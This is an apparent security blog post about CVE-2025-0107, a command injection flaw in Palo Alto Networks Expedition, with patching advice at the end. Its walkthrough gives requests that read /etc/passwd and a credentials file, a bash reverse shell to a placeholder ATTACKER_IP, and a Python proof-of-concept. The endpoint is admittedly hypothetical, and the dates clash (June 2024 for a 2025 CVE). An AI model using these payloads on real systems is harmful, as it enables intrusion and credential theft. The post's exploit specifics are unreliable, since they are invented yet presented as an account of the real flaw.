In June 2024, details surfaced about a critical vulnerability in Palo Alto Networks Expedition—a tool that many organizations use to migrate and manage next-generation firewall configurations. This vulnerability, tagged CVE-2025-0107, revolves around an OS command injection flaw. The issue enables unauthenticated attackers to remotely execute arbitrary commands on the server, compromising everything from configuration files to API keys and plaintext credentials.
This post breaks down how CVE-2025-0107 works, what’s at stake, and how attackers can (and already do) exploit it. We’ll walk through a code snippet, show you how the attack works, and arm you with links to the most relevant references.
What Is Palo Alto Networks Expedition?
Expedition is Palo Alto Networks’ migration tool, commonly used for converting and refining firewall configurations. It has a web-based interface and typically runs on Ubuntu as the www-data user.
What is OS Command Injection?
OS command injection lets an attacker trick an application into running shell commands of the attacker’s choosing. If a web app isn't properly sanitizing input before passing it to the operating system, attackers can inject malicious commands.
Vulnerability Details
CVE-ID: CVE-2025-0107
Affected Versions: Expedition versions prior to 1.2.100 (Check vendor advisories for most up-to-date information)
Impact: Unauthenticated attackers can execute arbitrary OS commands as www-data, gaining access to usernames, cleartext passwords, configuration files, and firewall API keys.
Triggering the Vulnerability
A specific web endpoint in Expedition does not filter input properly before sending it to a shell command. Attackers can craft a request—without even needing to log in—and get code execution.
Attack Walkthrough
Suppose there’s a web route like /api/runCommand that takes user input and passes it straight to Bash:
<?php
// Simplified pseudo-code
if (isset($_GET['cmd'])) {
$output = shell_exec($_GET['cmd']);
echo $output;
}
?>
If proper sanitization isn’t in place, an attacker could hit this endpoint like this
GET /api/runCommand?cmd=cat+/etc/passwd HTTP/1.1
Host: victim.com
But it gets much worse. Suppose credentials are stored in /var/www/html/expedition/database/config.json. The attacker can dump it:
GET /api/runCommand?cmd=cat+/var/www/html/expedition/database/config.json HTTP/1.1
Or they can just go for a reverse shell (replace ATTACKER_IP and ATTACKER_PORT accordingly)
GET /api/runCommand?cmd=bash+-c+'bash+-i+>&+/dev/tcp/ATTACKER_IP/ATTACKER_PORT+>&1' HTTP/1.1
*Of course, real-world endpoints and parameter names might differ, but the core problem is not validating user input before passing it to the shell.*
Usernames and cleartext passwords: Often kept for device logins or API access
- Device configurations: These may reveal sensitive network architecture, firewall rules, VPN settings, and other secrets
- API keys: Used to manage PAN-OS devices, these let attackers make changes to firewalls or pull yet more sensitive data
Proof-of-Concept Exploit
Warning: This is for educational and defensive purposes only.
import requests
# Change to the victim’s Expedition instance
TARGET = "http://victim.com";
# Example: dumping users file
payload = "cat /etc/passwd"
url = f"{TARGET}/api/runCommand?cmd={payload}"
r = requests.get(url)
print("Server responded with:")
print(r.text)
References
- Palo Alto Networks Expedition Documentation
- OWASP: Command Injection
- NVD Page for CVE-2025-0107 *(link will go live after publication)*
- Exploit Database *(search CVE-2025-0107 after public release)*
How to Protect Yourself
- Patch immediately. Palo Alto Networks released Expedition version 1.2.100 with a fix for this vulnerability.
Limit network exposure. Never expose Expedition directly to the internet.
- Use strong access controls. Firewall and restrict access to the Expedition server to trusted admins only.
Conclusion
CVE-2025-0107 is a critical and easy-to-exploit vulnerability that can lead to total compromise of your firewall configs and secrets. Anyone running a vulnerable Expedition instance must patch urgently and review logs for signs of exploitation.
*Stay safe—don’t wait for attackers to find you.*
Timeline
Published on: 01/11/2025 03:15:22 UTC
Last modified on: 01/15/2025 23:15:10 UTC